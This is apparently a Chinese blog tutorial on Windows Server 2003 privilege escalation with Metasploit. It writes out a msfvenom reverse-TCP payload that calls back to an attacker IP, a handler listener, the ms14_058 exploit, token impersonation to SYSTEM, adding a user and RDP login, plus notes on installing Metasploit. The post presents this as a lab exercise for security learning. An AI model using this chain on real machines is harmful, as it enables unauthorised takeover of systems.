前言
- metasploit 提权使用
常用的提权模块
metasploit 提权EXP存储文件夹路径
windows2003提权
环境:2003 server
1、生成攻击载荷
1 |
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=6666 -f exe > payload.exe |
2、接着在kali中运行msfconsole执行下面命令来监听(玩过msf应该都很熟悉)
1 |
use exploit/multi/handler |
3、首先去虚拟机中确认生成payload是否有用,发现得到session,可以去受害机进行执行获取session
4、受害机已经获得shell了,然后上传这个payload去一个可读可写的目录,然后进行运行就可以拿到session,我直接用大马执行
但是拿到的权限很低,接下来我们想办法上的system权限,但是getsystem/getprivs并不能在这里轻松提权
5、接着用post里面的模块multi检测该系统可利用的提权模块
1 |
run post/multi/recon/local_exploit_suggester |
可以发现有很多,我们随便选一个ms14_058的吧,先background收起sessions,然后再进行利用
1 |
background |
先看看sess的id以确定利用时所选的set
1 |
session -l 查看id |
然后set session 1
接着提权成功,很自动化,很无脑提权到最高权限
一些基础命令的使用和记录
1 |
ps 查看pid |
接着常规操作,有系统权限,增加用户
1 |
shell 进入cmd命令操作 |
对方在公网的话,直接登3389,kali的话用
1 |
rdesktop 192.168.0.115 |
在介绍一下ms16-075的提权方法
还是回到普通权限
1、伪造身份
1 |
use incognito |
2、执行一下ms075的potato.exe其实,上面已经显示可以提权了
1 |
execute -cH -f C:/RECYCLER/potato.exe |
3、直接伪造系统身份
1 |
impersonate_token "NT AUTHORITY\SYSTEM" |
记录一些msf在centos安装采坑
安装msf的具体命令如下
1 |
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall |
接着本地出现msfinstall,然后给权限和安装
1 |
chmod 755 msfinstall |
msf卸载方法(出现故障使用)
1 |
yum remove metasploit-framework |
msfupdate之后需要进行环境变量配置
1 |
export PATH="/opt/metasploit-framework/bin:$PATH" |
我的个人博客
孤桜懶契:http://gylq.gitee.io
FROM:gylq.gitee Author:孤桜懶契
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论